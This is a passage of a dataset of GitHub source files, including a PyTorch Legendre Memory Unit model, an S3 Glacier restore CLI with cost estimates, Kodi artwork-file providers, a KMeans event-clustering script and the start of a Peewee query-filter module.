init.constant_(self.e_m, 0)\n # Initialize kernels\n init.xavier_normal_(self.W_x)\n 
init.xavier_normal_(self.W_h)\n init.xavier_normal_(self.W_m)\n\n def stateSpaceMatrices(self, memory_size, theta):\n \"\"\"Returns the discretized state space matrices A and B.\"\"\"\n\n Q = np.arange(memory_size, dtype=np.float64).reshape(-1, 1)\n R = (2 * Q + 1) / theta\n i, j = np.meshgrid(Q, Q, indexing=\"ij\")\n\n # Continuous\n A = R * np.where(i < j, -1, (-1.0) ** (i - j + 1))\n B = R * ((-1.0) ** Q)\n C = np.ones((1, memory_size))\n D = np.zeros((1,))\n\n # Convert to discrete\n A, B, C, D, dt = cont2discrete(system=(A, B, C, D), dt=1.0, method=\"zoh\")\n\n return A, B\n\n def forward(self, x, state):\n \"\"\"\n Parameters:\n x (torch.tensor):\n Input of size [batch_size, input_size]\n state (tuple):\n h (torch.tensor) : [batch_size, hidden_size]\n m (torch.tensor) : [batch_size, memory_size]\n \"\"\"\n\n h, m = state\n\n # Equation (7) of the paper\n u = (\n F.linear(x, self.e_x) + F.linear(h, self.e_h) + F.linear(m, self.e_m)\n ) # [batch_size, 1]\n\n # Equation (4) of the paper\n m = F.linear(m, self.A) + F.linear(u, self.B) # [batch_size, memory_size]\n\n # Equation (6) of the paper\n h = self.f(\n F.linear(x, self.W_x) + F.linear(h, self.W_h) + F.linear(m, self.W_m)\n ) # [batch_size, hidden_size]\n\n return h, m\n\n\nclass LMU(nn.Module):\n \"\"\"LMU layer.\n\n Parameters:\n input_size (int) :\n Size of the input vector (x_t)\n hidden_size (int) :\n Size of the hidden vector (h_t)\n memory_size (int) :\n Size of the memory vector (m_t)\n theta (int) :\n The number of timesteps in the sliding window\n that is represented using the LTI system\n learn_a (boolean) :\n Whether to learn the matrix A (default = False)\n learn_b (boolean) :\n Whether to learn the matrix B (default = False)\n \"\"\"\n\n def __init__(\n self, input_size, hidden_size, memory_size, theta, learn_a=False, learn_b=False\n ):\n super(LMU, self).__init__()\n self.hidden_size = hidden_size\n self.memory_size = memory_size\n self.cell = LMUCell(\n input_size, hidden_size, memory_size, theta, learn_a, learn_b\n )\n\n def forward(self, x, state=None):\n \"\"\"\n Parameters:\n x (torch.tensor):\n Input of size [batch_size, seq_len, input_size]\n state (tuple) : (default = None)\n h (torch.tensor) : [batch_size, hidden_size]\n m (torch.tensor) : [batch_size, memory_size]\n \"\"\"\n\n # Assuming batch dimension is always first,\n # followed by seq. 
length as the second dimension\n batch_size = x.size(0)\n seq_len = x.size(1)\n\n # Initial state (h_0, m_0)\n if state is None:\n h_0 = torch.zeros(batch_size, self.hidden_size)\n m_0 = torch.zeros(batch_size, self.memory_size)\n if x.is_cuda:\n h_0 = h_0.cuda()\n m_0 = m_0.cuda()\n state = (h_0, m_0)\n\n # Iterate over the timesteps\n output = []\n for t in range(seq_len):\n x_t = x[:, t, :] # [batch_size, input_size]\n h_t, m_t = self.cell(x_t, state)\n state = (h_t, m_t)\n output.append(h_t)\n\n output = torch.stack(output) # [seq_len, batch_size, hidden_size]\n output = output.permute(1, 0, 2) # [batch_size, seq_len, hidden_size]\n\n return output, state # state is (h_n, m_n) where n = seq_len\n\n\nclass LMUFFT(nn.Module):\n \"\"\"Parallelized LMU Layer.\n\n Parameters:\n input_size (int) :\n Size of the input vector (x_t)\n hidden_size (int) :\n Size of the hidden vector (h_t)\n memory_size (int) :\n Size of the memory vector (m_t)\n seq_len (int) :\n Size of the sequence length (n)\n theta (int) :\n The number of timesteps in the sliding\n window that is represented using the LTI system\n \"\"\"\n\n def __init__(self, input_size, hidden_size, memory_size, seq_len, theta):\n super(LMUFFT, self).__init__()\n\n self.hidden_size = hidden_size\n self.memory_size = memory_size\n self.seq_len = seq_len\n self.theta = theta\n\n self.W_u = nn.Linear(in_features=input_size, out_features=1)\n self.f_u = nn.ReLU()\n self.W_h = nn.Linear(\n in_features=memory_size + input_size, out_features=hidden_size\n )\n self.f_h = nn.ReLU()\n\n A, B = self.stateSpaceMatrices()\n self.register_buffer(\"A\", A) # [memory_size, memory_size]\n self.register_buffer(\"B\", B) # [memory_size, 1]\n\n H, fft_H = self.impulse()\n self.register_buffer(\"H\", H) # [memory_size, seq_len]\n self.register_buffer(\"fft_H\", fft_H) # [memory_size, seq_len + 1]\n\n def stateSpaceMatrices(self):\n \"\"\"Returns the discretized state space matrices A and B.\"\"\"\n\n Q = np.arange(self.memory_size, dtype=np.float64).reshape(-1, 1)\n R = (2 * Q + 1) / self.theta\n i, j = np.meshgrid(Q, Q, indexing=\"ij\")\n\n # Continuous\n A = R * np.where(i < j, -1, (-1.0) ** (i - j + 1))\n B = R * ((-1.0) ** Q)\n C = np.ones((1, self.memory_size))\n D = np.zeros((1,))\n\n # Convert to discrete\n A, B, C, D, dt = cont2discrete(system=(A, B, C, D), dt=1.0, method=\"zoh\")\n\n # To torch.tensor\n A = torch.from_numpy(A).float() # [memory_size, memory_size]\n B = torch.from_numpy(B).float() # [memory_size, 1]\n\n return A, B\n\n def impulse(self):\n \"\"\"Returns the matrices H and the 1D Fourier transform of H (Equations\n 23, 26 of the paper)\"\"\"\n\n H = []\n A_i = torch.eye(self.memory_size)\n for t in range(self.seq_len):\n H.append(A_i @ self.B)\n A_i = self.A @ A_i\n\n H = torch.cat(H, dim=-1) # [memory_size, seq_len]\n fft_H = fft.rfft(H, n=2 * self.seq_len, dim=-1) # [memory_size, seq_len + 1]\n\n return H, fft_H\n\n def forward(self, x):\n \"\"\"\n Parameters:\n x (torch.tensor):\n Input of size [batch_size, seq_len, input_size]\n \"\"\"\n\n batch_size, seq_len, input_size = x.shape\n\n # Equation 18 of the paper\n u = self.f_u(self.W_u(x)) # [batch_size, seq_len, 1]\n\n # Equation 26 of the paper\n fft_input = u.permute(0, 2, 1) # [batch_size, 1, seq_len]\n fft_u = fft.rfft(\n fft_input, n=2 * seq_len, dim=-1\n ) # [batch_size, seq_len, seq_len+1]\n\n # Element-wise multiplication (uses broadcasting)\n # [batch_size, 1, seq_len+1] * [1, memory_size, seq_len+1]\n temp = fft_u * self.fft_H.unsqueeze(0) # [batch_size, memory_size, 
seq_len+1]\n\n        m = fft.irfft(\n            temp, n=2 * seq_len, dim=-1\n        )  # [batch_size, memory_size, seq_len+1]\n        m = m[:, :, :seq_len]  # [batch_size, memory_size, seq_len]\n        m = m.permute(0, 2, 1)  # [batch_size, seq_len, memory_size]\n\n        # Equation 20 of the paper (W_m@m + W_x@x = W@[m;x])\n        input_h = torch.cat(\n            (m, x), dim=-1\n        )  # [batch_size, seq_len, memory_size + input_size]\n        h = self.f_h(self.W_h(input_h))  # [batch_size, seq_len, hidden_size]\n\n        h_n = h[:, -1, :]  # [batch_size, hidden_size]\n\n        return h, h_n\n","repo_name":"proroklab/popgym","sub_path":"popgym/baselines/models/lmu.py","file_name":"lmu.py","file_ext":"py","file_size_in_byte":10069,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"21"} +{"seq_id":"7996192662","text":"#!/usr/bin/env python\n\"\"\"\nModule Docstring\n\"\"\"\n\nfrom .version import __version__\n__author__ = \"Matt Olm\"\n__version__ = __version__\n__license__ = \"MIT\"\n\nimport os\nimport sys\nimport boto3\nimport time\nimport copy\nimport argparse\nimport logging\nimport awswrangler\nfrom time import sleep\n\nimport pandas as pd\nimport glrestore.s3_utils\n\ndef main():\n    \"\"\" This is executed when run from the command line \"\"\"\n    args = parse_args()\n    RestoreController(args).main()\n\nclass RestoreController(object):\n    \"\"\"\n    Main controller of the restore command\n    \"\"\"\n    def __init__(self, args):\n        \"\"\"\n        Initialize and store args\n        \"\"\"\n        self.args = args\n        self.ori_args = copy.deepcopy(args)\n        self.kwargs = vars(self.args)\n\n    def main(self):\n        \"\"\"\n        The main controller for restore\n        \"\"\"\n        self.parse_arguments()\n\n        logging.debug(\"Get objects to restore\")\n        self.file_classifications = self.get_files_to_restore_v2(self.kwargs.get('files'))\n\n        if self.kwargs.get('report', True):\n            logging.info(\"\\n!!!!!!!!!!!\\nWill NOT RESTORE anything because of --report flag; the following information is FYI only\\n!!!!!!!!!!!!\")\n\n            logging.debug(\"Print status\")\n            self.print_status(sleep=False)\n\n            logging.debug(\"Create report\")\n            self.create_report()\n\n        else:\n            logging.debug(\"Print status\")\n            self.print_status()\n\n            logging.debug(\"Restoring files\")\n            self.restore_files()\n\n            if self.kwargs.get('wait'):\n                self.wait_for_restore()\n\n\n    def parse_arguments(self):\n        \"\"\"\n        Parse the arguments and add them to this object as attributes\n        \"\"\"\n        args = self.kwargs\n\n        # Set up the log\n        self.setup_log()\n\n        # Set up boto3; use the given credential profile when one is provided\n        if args.get('profile'):\n            boto3.setup_default_session(profile_name=args.get('profile'))\n        session = boto3.session.Session()\n        self.kwargs['client'] = session.client(\"s3\")\n\n    def get_files_to_restore_v2(self, files):\n        \"\"\"\n        Return a list of s3 files to restore\n        \"\"\"\n        # Get the command line argument\n        base_restore = files\n\n        # Load files if need be\n        to_restore = []\n        for br in base_restore:\n            if not br.startswith('s3://'):\n                with open(br, 'r') as r:\n                    for line in r.readlines():\n                        if not line.startswith('s3://'):\n                            logging.error(f\"CRITICAL ERROR! You passed {br} to -f, which doesn't start with s3://. I assumed this was a file of files to restore, but the line {line} also doesn't start with s3://. 
Will ignore {br} and {line}\")\n else:\n to_restore.append(line.strip())\n else:\n to_restore.append(br)\n\n dbs = []\n for br in to_restore:\n db = glrestore.s3_utils.get_object_storage_class_v2(br)\n dbs.append(db)\n\n fc = pd.concat(dbs).reset_index(drop=True)\n return fc\n\n def print_status(self, sleep=True):\n \"\"\"\n Print status and estimated costs\n \"\"\"\n debug = self.kwargs.get('debug', False)\n\n cdb = self.file_classifications\n logging.info(f\"Identified {len(cdb)} files\")\n\n tdb = cdb[cdb['restore_status'] != False]\n logging.info(f\"Of these, {len(tdb)} are being actively restored or are already restored\")\n\n tdb = cdb[~cdb['storage_class'].isin(['GLACIER', 'DEEP_ARCHIVE'])]\n logging.info(f\"Of these, {len(tdb)} are not in glacier\")\n\n fcdb = cdb[(cdb['restore_status'] == False) & (cdb['storage_class'].isin(['GLACIER', 'DEEP_ARCHIVE']))]\n logging.info(f\"Restoring the remaining {len(fcdb)} objects will cost the following:\")\n\n self.display_restore_costs(fcdb, sleep=sleep)\n\n self.files_to_restore_filtered = fcdb['file'].tolist()\n\n if debug:\n for f in fcdb['file'].tolist():\n logging.debug(f)\n\n def create_report(self):\n \"\"\"\n Create a report instead of actually restoring anything\n \"\"\"\n outloc = self.kwargs.get('output')\n if not outloc.endswith('.csv'):\n outloc += '.csv'\n\n cdb = self.file_classifications\n logging.info(f\"Identified {len(cdb)} files. Will create a report on them at {outloc}\")\n cdb.to_csv(outloc, index=False)\n\n\n def display_restore_costs(self, fcdb, sleep=True):\n \"\"\"\n Print how much this is going to cost\n\n NOTE- YOURE TREATING EVERYTHING AS IF IT'S BEING RESTORED FROM DEEP ARCHIVE; the \"standard\" is actully a bit cheaper when restoring from flexible\n \"\"\"\n S3_COST_PER_GB_PER_MONTH = 0.022\n\n TIER2REQUEST2COST = {\n 'Expedited':10,\n 'Standard':0.10,\n 'Bulk':0.025\n }\n TIER2REQUEST2SIZE_COST = {\n 'Expedited': 0.03,\n 'Standard': 0.02,\n 'Bulk': 0.0025\n }\n\n # 0) Calculate the size and number of objects to restore\n num_obs = len(fcdb)\n size_obs = sum(fcdb['size_bytes']) / 1e9\n tier = self.kwargs.get('speed')\n\n # 1) Calculate the cost for the extra storage\n storage_cost = size_obs * (self.kwargs.get('days') / 30) * S3_COST_PER_GB_PER_MONTH\n\n # 2) Calculate the cost for the retrival costs\n t2cs = {}\n for t in ['Expedited', 'Standard', 'Bulk']:\n t2cs[t] = [(num_obs / 1000) * TIER2REQUEST2COST[t], size_obs * TIER2REQUEST2SIZE_COST[t]]\n\n # Display this info\n msg = \"\\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\\n\"\n\n msg += f\"It will cost the following to restore {num_obs} objects totalling {size_obs:.2f}GB:\\n\"\n for t, d in t2cs.items():\n msg += f\"\\t{t}: ${d[0]:.2f} + ${d[1]:.2f}\\n\"\n\n msg += f\"It will also cost ${storage_cost:.2f} to restore the {size_obs:.3f}GB of data for {self.kwargs.get('days')} days\"\n msg += '\\n----------------------------\\n'\n msg += f\"Your TOTAL COST at {tier} speed will be ${storage_cost + sum(t2cs[tier]):0.2f}\\n\"\n msg += '\\n----------------------------\\n'\n\n if sleep:\n msg += f\"You chose to restore at {tier} speed. Please quit the program now (ctrl + c) if you'd like to change that! 
I'll wait 5 seconds\"\n msg += \"\\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\\n\"\n\n logging.info(msg)\n if sleep:\n time.sleep(5)\n\n def restore_files(self):\n \"\"\"\n Actually do the file restoring\n \"\"\"\n files_to_restore_filtered = self.files_to_restore_filtered\n\n for f in files_to_restore_filtered:\n\n glrestore.s3_utils.restore_file(f, **self.kwargs)\n\n logging.info(f\"Restore commands finished launching\")\n\n def wait_for_restore(self):\n \"\"\"\n Enter the loop where you wait for objects to restore before exiting the program\n \"\"\"\n remaining = self.files_to_restore_filtered\n print(f\"I am going to wait for {len(remaining)} files to be restored\")\n\n start = time.time()\n while True:\n sleep(300)\n\n cdb = self.get_files_to_restore_v2(remaining)\n remaining = cdb[(cdb['restore_status'] == \"restoring\")]['file'].tolist()\n\n if len(remaining) == 0:\n break\n\n elapsed = time.time() - start\n\n sys.stdout.write('\\r')\n # the exact output you're looking for:\n sys.stdout.write(f'Ive been waiting for {time.strftime(\"%Hh%Mm%Ss\", time.gmtime(elapsed))}: {len(remaining)} files remain')\n sys.stdout.flush()\n\n elapsed = time.time() - start\n print(f'All done! The restore took {time.strftime(\"%Hh%Mm%Ss\", time.gmtime(elapsed))}')\n\n def setup_log(self):\n args = self.kwargs\n\n # Set up the log\n root = logging.getLogger()\n\n if args.get('debug', False):\n root.setLevel(logging.DEBUG)\n else:\n root.setLevel(logging.INFO)\n\n handler = logging.StreamHandler(sys.stdout)\n if args.get('debug', False):\n root.setLevel(logging.DEBUG)\n else:\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n # Play debug message\n logging.debug(\"!\" * 80)\n logging.debug(\"Command to run was: {0}\\n\".format(' '.join(sys.argv)))\n logging.debug(\"glrestore version {0} was run \\n\".format(__version__))\n logging.debug(\"!\" * 80 + '\\n')\n\n\ndef controller(args):\n \"\"\" Main entry point of the app \"\"\"\n logging.info(\"hello world\")\n logging.info(args)\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-f', '--files',\n help=\"File or files to be restored (or a list of files). Can include wildcards. Must start with the bucket in the format (s3://)\",\n nargs='*', default=[])\n\n parser.add_argument(\n '-d', '--days',\n help=\"Number of days to restore the data to S3 for. During this time we pay for both glacier and S3 storage of the data.\",\n default=7, type=int)\n\n parser.add_argument(\n '-s', '--speed',\n help=\"Speed at which to restore the data; faster is more expensive. Expedited=(1-5 min), Standard=(3-5 hr), Bulk=(12 hr)\",\n default='Expedited', choices=['Expedited', 'Standard', 'Bulk'],)\n\n parser.add_argument(\n '--profile',\n help=\"AWS credential profile to use. Will use default by default\")\n\n parser.add_argument(\n '--report',\n help='Rather than actually doing anything, just make a report of which files are matched by the -f argument and what their status is. Will make a file with this info based on the name in the -o argument',\n default=False, action=\"store_true\")\n\n parser.add_argument(\n '-o', '--output',\n help='Where to store the --report information',\n default='glrestore_report.txt')\n\n parser.add_argument(\n '--wait',\n help='Wait for restore to finish before exiting the program. 
Works with --report too',\n default=False, action=\"store_true\")\n\n parser.add_argument(\n '--debug',\n help='Create debugging log file',\n default=False, action= \"store_true\")\n\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"%(prog)s (version {version})\".format(version=__version__))\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"MrOlm/glrestore","sub_path":"glrestore/glrestore.py","file_name":"glrestore.py","file_ext":"py","file_size_in_byte":10702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20900641766","text":"import os\nimport xbmcvfs\nfrom abc import ABCMeta\n\nfrom lib.libs import mediatypes\nfrom lib.libs.addonsettings import settings\nfrom lib.libs.mediainfo import arttype_matches_base, format_arttype, find_central_infodir\nfrom lib.libs.utils import SortedDisplay, natural_sort, get_movie_path_list, get_pathsep, \\\n iter_possible_cleannames, parent_dir\n\nARTWORK_EXTS = ('.jpg', '.png', '.gif')\nARTIST_INFOFOLDER_PROVIDER = SortedDisplay('file:art', 20223)\n\nARTTYPE_MAXLENGTH = 30\n\nclass ArtFilesAbstractProvider(object):\n __metaclass__ = ABCMeta\n # 13514 = Local art\n name = SortedDisplay('file:art', 13514)\n\n def buildimage(self, url, title, fromartistfolder=False):\n provider = ARTIST_INFOFOLDER_PROVIDER if fromartistfolder else self.name\n result = {'url': url, 'provider': provider, 'preview': url}\n result['title'] = title\n result['rating'] = SortedDisplay(0, '')\n result['size'] = SortedDisplay(0, '')\n result['language'] = 'xx'\n return result\n\n def getextra(self, path, exacttypes, thumbs=False):\n arttype = 'thumb' if thumbs else 'fanart'\n extradir = 'extrathumbs' if thumbs else 'extrafanart'\n sep = get_pathsep(path)\n missing, nextno = getopentypes(exacttypes, arttype)\n path += extradir + sep\n _, files = xbmcvfs.listdir(path)\n files.sort(key=natural_sort)\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n popped = missing.pop(0) if missing else None\n nexttype = popped if popped else format_arttype(arttype, nextno)\n result[nexttype] = self.buildimage(path + filename, extradir + sep + filename)\n if not popped:\n nextno += 1\n return result\n\nclass ArtFilesSeriesProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.TVSHOW\n\n alttypes = {'logo': 'clearlogo', 'character': 'characterart'}\n\n def get_exact_images(self, mediaitem):\n path = mediaitem.file\n dirs, files = xbmcvfs.listdir(path)\n files.sort(key=natural_sort)\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n if '.' 
in basefile or ' ' in basefile:\n continue\n if basefile.startswith('season') and basefile.count('-'):\n seasonsplit = basefile.split('-')\n if len(seasonsplit) == 3:\n if seasonsplit[1] not in ('specials', 'all'):\n continue\n number = 0 if seasonsplit[1] == 'specials' else -1\n arttype = seasonsplit[2]\n elif len(seasonsplit) == 2:\n try:\n number = int(seasonsplit[0].replace('season', ''))\n except ValueError:\n continue\n arttype = seasonsplit[1]\n else:\n continue\n if not arttype.isalnum():\n continue\n arttype = 'season.{0}.{1}'.format(number, arttype)\n else:\n if not basefile.isalnum() or len(basefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = basefile\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n result[arttype] = self.buildimage(path + filename, filename)\n\n if dirs and 'extrafanart' in dirs:\n result.update(self.getextra(path, result.keys()))\n\n return result\n\nclass ArtFilesMovieProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.MOVIE\n\n alttypes = {'logo': 'clearlogo', 'disc': 'discart'}\n\n def get_exact_images(self, mediaitem):\n path = mediaitem.file\n paths = get_movie_path_list(path)\n result = {}\n sep = get_pathsep(path)\n path = os.path.dirname(paths[0]) + sep\n havespecific = []\n for dirname, moviefile in (os.path.split(p) for p in paths):\n dirname += sep\n check_moviebase = os.path.splitext(moviefile)[0].lower()\n dirs, files = xbmcvfs.listdir(dirname)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n imagefile = os.path.splitext(check_filename)[0]\n specific = False\n if '-' in imagefile:\n firstbit, imagefile = imagefile.rsplit('-', 1)\n if firstbit != check_moviebase:\n continue\n specific = True\n if not imagefile.isalnum() or len(imagefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = imagefile\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n if specific or arttype not in havespecific:\n result[arttype] = self.buildimage(dirname + filename, filename)\n if specific:\n havespecific.append(arttype)\n\n if dirs:\n if 'extrafanart' in dirs:\n result.update(self.getextra(path, result.keys()))\n if 'extrathumbs' in dirs:\n result.update(self.getextra(path, result.keys(), True))\n\n return result\n\nclass ArtFilesMovieSetProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.MOVIESET\n\n alttypes = {'logo': 'clearlogo', 'folder': 'thumb'}\n\n def get_exact_images(self, mediaitem):\n path, inputfilename = os.path.split(mediaitem.file)\n sep = get_pathsep(path)\n path += sep\n dirs, files = xbmcvfs.listdir(path)\n check_inputbase = os.path.splitext(inputfilename)[0] if inputfilename else ''\n result = {}\n if inputfilename:\n dirname = next((name for name in dirs if name in iter_possible_cleannames(check_inputbase)), None)\n if dirname: # '[centraldir]/[set name]/[arttype].[ext]'\n dirname = path + dirname + sep\n _, dfiles = xbmcvfs.listdir(dirname)\n for filename in dfiles:\n if not filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n\n result[arttype] = self.buildimage(dirname + filename, filename)\n\n if not 
result:\n for filename in files:\n if not filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(filename)[0]\n if check_inputbase: # '[centraldir]/[set name]-[arttype].[ext]'\n if '-' not in basefile:\n continue\n firstbit, arttype = basefile.rsplit('-', 1)\n if not arttype.isalnum() or firstbit not in iter_possible_cleannames(check_inputbase):\n continue\n else: # parent of movie directory\n if not basefile.isalnum() or len(basefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = basefile\n\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n\n result[arttype] = self.buildimage(path + filename, filename)\n return result\n\nclass ArtFilesEpisodeProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.EPISODE\n\n def get_exact_images(self, mediaitem):\n path, inputfilename = os.path.split(mediaitem.file)\n path += get_pathsep(path)\n _, files = xbmcvfs.listdir(path)\n check_inputbase = os.path.splitext(inputfilename)[0].lower()\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n if '-' not in basefile:\n continue\n firstbit, arttype = basefile.rsplit('-', 1)\n if firstbit != check_inputbase or not arttype.isalnum():\n continue\n\n result[arttype] = self.buildimage(path + filename, filename)\n return result\n\nclass ArtFilesMusicVideoProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.MUSICVIDEO\n\n alttypes = {'logo': 'clearlogo', 'disc': 'discart', 'cdart': 'discart'}\n\n def get_exact_images(self, mediaitem):\n path, inputfilename = os.path.split(mediaitem.file)\n path += get_pathsep(path)\n dirs, files = xbmcvfs.listdir(path)\n check_inputbase = os.path.splitext(inputfilename)[0].lower()\n paths = get_movie_path_list(path)\n result = {}\n sep = get_pathsep(path)\n path = os.path.dirname(paths[0]) + sep\n havespecific = []\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n specific = False\n if '-' in basefile:\n firstbit, basefile = basefile.rsplit('-', 1)\n if firstbit != check_inputbase:\n continue\n specific = True\n if not basefile.isalnum() or len(basefile) > ARTTYPE_MAXLENGTH:\n continue\n arttype = basefile\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n if specific or arttype not in havespecific:\n result[arttype] = self.buildimage(path + filename, filename)\n if specific:\n havespecific.append(arttype)\n\n if dirs:\n if 'extrafanart' in dirs:\n result.update(self.getextra(path, result.keys()))\n if 'extrathumbs' in dirs:\n result.update(self.getextra(path, result.keys(), True))\n\n return result\n\nclass ArtFilesArtistProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.ARTIST\n\n alttypes = {'folder': 'thumb', 'logo': 'clearlogo'}\n\n def get_exact_images(self, mediaitem):\n path = find_central_infodir(mediaitem)\n if not path:\n return {}\n _, files = xbmcvfs.listdir(path)\n result = {}\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(check_filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in 
self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n result[arttype] = self.buildimage(path + filename, filename, True)\n return result\n\nclass ArtFilesAlbumProvider(ArtFilesArtistProvider):\n mediatype = mediatypes.ALBUM\n\n alttypes = {'folder': 'thumb', 'cover': 'thumb', 'disc': 'discart', 'cdart': 'discart'}\n\n def get_exact_images(self, mediaitem):\n paths = (mediaitem.file, find_central_infodir(mediaitem))\n if settings.albumartwithmediafiles:\n paths = (paths[1], paths[0])\n result = {}\n for path in paths:\n if not path:\n continue\n _, files = xbmcvfs.listdir(path)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(check_filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n if arttype in result.keys():\n continue\n result[arttype] = self.buildimage(path + filename, filename, path != mediaitem.file)\n\n for disc in sorted(mediaitem.discfolders.keys()):\n path = mediaitem.discfolders[disc]\n _, files = xbmcvfs.listdir(path)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n arttype = os.path.splitext(check_filename)[0]\n if not arttype.isalnum() or len(arttype) > ARTTYPE_MAXLENGTH:\n continue\n if settings.identify_alternatives and arttype in self.alttypes.keys():\n arttype = self.alttypes[arttype]\n parentdir = parent_dir(path) + get_pathsep(path)\n if arttype == 'discart':\n if 'discart' not in result:\n result['discart'] = self.buildimage(path + filename, parentdir + filename)\n if not disc:\n continue\n arttype += str(disc)\n if arttype in result:\n continue\n result[arttype] = self.buildimage(path + filename, parentdir + filename)\n\n return result\n\nclass ArtFilesSongProvider(ArtFilesAbstractProvider):\n mediatype = mediatypes.SONG\n\n def get_exact_images(self, mediaitem):\n paths = (mediaitem.file, find_central_infodir(mediaitem))\n if not paths[0] and not paths[1]:\n return {}\n if settings.albumartwithmediafiles:\n paths = (paths[1], paths[0])\n if mediaitem.file:\n check_inputbase = os.path.splitext(os.path.basename(mediaitem.file))[0].lower()\n result = {}\n for path in paths:\n if not path:\n continue\n centraldir = path != mediaitem.file\n path = os.path.dirname(path) + get_pathsep(path)\n _, files = xbmcvfs.listdir(path)\n for filename in files:\n check_filename = filename.lower()\n if not check_filename.endswith(ARTWORK_EXTS):\n continue\n basefile = os.path.splitext(check_filename)[0]\n if '-' not in basefile:\n continue\n firstbit, arttype = basefile.rsplit('-', 1)\n if not arttype.isalnum():\n continue\n if not centraldir and firstbit != check_inputbase:\n continue\n if centraldir and firstbit not in (i.lower() for i in iter_possible_cleannames(mediaitem.label)):\n continue\n result[arttype] = self.buildimage(path + filename, filename, centraldir)\n return result\n\ndef getopentypes(existingtypes, arttype):\n keys = [exact for exact in sorted(existingtypes, key=natural_sort)\n if arttype_matches_base(arttype, exact)]\n missing = []\n nextstart = 0\n for count in range(100):\n if not keys:\n nextstart = count\n break\n exact = format_arttype(arttype, count)\n if exact in keys:\n keys.remove(exact)\n else:\n missing.append(exact)\n return missing, 
nextstart\n","repo_name":"henryjfry/repository.thenewdiamond","sub_path":"script.artwork.beef/lib/providers/artfiles.py","file_name":"artfiles.py","file_ext":"py","file_size_in_byte":16393,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"15042305966","text":"from sklearn.cluster import KMeans\nfrom pandas import DataFrame\nimport pandas as pd\n\nna = ['None', ' ', 'NA', '']\npath = \"data/events.csv\"\noutput_path = \"data/cluster_events.csv\"\nevents = pd.read_csv(path, header=0, na_values=na)\nevents_id = events.iloc[:, 0]\nevents_keywords = events.iloc[:, 10:] \n\n\nkmeans = KMeans(n_clusters = 50, max_iter = 40, n_init = 4)\nclusters = DataFrame(kmeans.fit_predict(events_keywords))\nresult = pd.concat([events_id, clusters], axis=1, join='inner')\nresult.columns = ['event_id', 'cluster']\nresult.to_csv(output_path, na_rep = 'NA', header = True, index = False)\n","repo_name":"sumeet29/Event-Recommendation-Engine","sub_path":"cluster_events.py","file_name":"cluster_events.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"4900215265","text":"\"\"\"Module for creating a Peewee filter query dynamically.\n\nThis module is used for creating a Peewee query based on request fields.\n\nReferences\n----------\nQuery operators\nhttp://docs.peewee-orm.com/en/latest/peewee/query_operators.html\n\n\"\"\"\nimport operator\nfrom functools import reduce\nfrom typing import Type\n\nimport peewee\nfrom peewee import (Model, Field, CharField, FixedCharField, TextField,\n                    UUIDField, ModelSelect)\n\nfrom app.utils.constants import (REQUEST_QUERY_DELIMITER,\n                                 STRING_QUERY_OPERATORS, 